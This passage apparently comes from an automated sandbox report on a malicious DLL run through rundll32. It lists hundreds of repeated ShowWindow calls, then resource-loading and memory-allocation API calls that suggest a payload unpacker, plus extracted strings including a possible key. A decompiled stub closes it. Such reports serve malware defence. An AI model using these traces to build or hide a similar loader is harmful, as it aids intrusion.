                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002EED
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002EF1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002EF5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002EF9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002EFD
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F01
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F05
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F09
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F0D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F11
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F15
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F19
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F1D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F21
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F25
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F29
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F2D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F31
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F35
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F39
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F3D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F41
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F45
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F49
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F4D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F51
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F55
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F59
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F5D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F61
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F65
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F69
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F6D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F71
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F75
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F79
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F7D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F81
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F85
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F89
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F8D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F91
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F95
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F99
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002F9D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002FA1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002FA5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002FA9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002FAD
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002FB1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002FB5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002FB9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002FBD
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002FC1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002FC5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002FC9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002FCD
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002FD1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002FD5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002FD9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002FDD
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002FE1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002FE5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002FE9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002FED
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002FF1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002FF5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002FF9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10002FFD
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003001
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003005
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003009
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000300D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003011
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003015
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003019
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000301D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003021
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003025
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003029
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000302D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003031
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003035
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003039
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000303D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003041
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003045
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003049
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000304D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003051
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003055
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003059
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000305D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003061
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003065
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003069
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000331D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003321
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003325
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003329
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000332D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003331
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003335
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003339
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000333D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003341
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003345
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003349
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000334D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003351
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003355
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003359
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000335D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003361
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003365
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003369
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000336D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003371
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003375
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003379
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000337D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003381
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003385
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003389
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000338D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003391
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003395
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003399
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000339D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100033A1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100033A5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100033A9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100033AD
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100033B1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100033B5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100033B9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100033BD
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100033C1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100033C5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100033C9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100033CD
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100033D1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100033D5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100033D9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100033DD
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100033E1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100033E5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100033E9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100033ED
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100033F1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100033F5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100033F9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100033FD
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003401
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003405
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003409
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000340D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003411
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003415
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003419
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000341D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003421
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003425
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003429
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000342D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003431
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003435
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003439
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000343D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003441
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003445
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003449
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000344D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003451
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003455
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003459
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000345D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003461
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003465
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003469
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000346D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003471
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003475
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003479
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000347D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003481
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003485
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003489
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000348D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003491
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003495
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003499
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000349D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100034A1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100034A5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100034A9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100034AD
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100034B1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100034B5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100034B9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100034BD
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100034C1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100034C5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100034C9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100034CD
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100034D1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100034D5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100034D9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100034DD
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100034E1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100034E5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100034E9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100034ED
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100034F1
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100034F5
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100034F9
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 100034FD
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003501
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003505
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003509
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000350D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003511
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003515
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003519
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000351D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003521
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003525
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003529
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 1000352D
                                                                                                                                • ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003531
                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 100037ED
                                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 10003811
                                                                                                                                • LdrFindResource_U.NTDLL(10000000,?,00000003,?), ref: 10003829
                                                                                                                                • LdrAccessResource.NTDLL(10000000,?,?,?), ref: 10003847
                                                                                                                                • WriteFileGather.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003852
                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,LdrF), ref: 10003A18
                                                                                                                                  • Part of subcall function 10001140: _malloc.LIBCMT ref: 10001145
                                                                                                                                  • Part of subcall function 10004380: SetLastError.KERNEL32(0000007F,10003A72,00000000,RunDLL,00000000,?), ref: 10004398
                                                                                                                                • MessageBoxA.USER32 ref: 10003A7E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ShowWindow$AddressProc$AccessAllocErrorFileFindGatherLastLibraryLoadMessageResourceResource_String_base::_VirtualWriteXlen_malloc_memcpy_sstd::_
                                                                                                                                • String ID: Acces$G1B3gZ@zq*H_ZfAmhTkSeVF4VAg4Pd2B%miXGSaKK>>k+Xyaiws&v#d4$Ldr$LdrF$Resour$RunDLL$ce_U$ind$ntdll.dll$sResource
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph: function 10004500 (legend: Executed / Not Executed)
                                                                                                                                C-Code - Quality: 89%
                                                                                                                                			E10004500(intOrPtr __ecx) {
                                                                                                                                				void* _t62;
                                                                                                                                				signed int _t68;
                                                                                                                                				signed int _t70;
                                                                                                                                				void* _t71;
                                                                                                                                				long _t73;
                                                                                                                                				void* _t81;
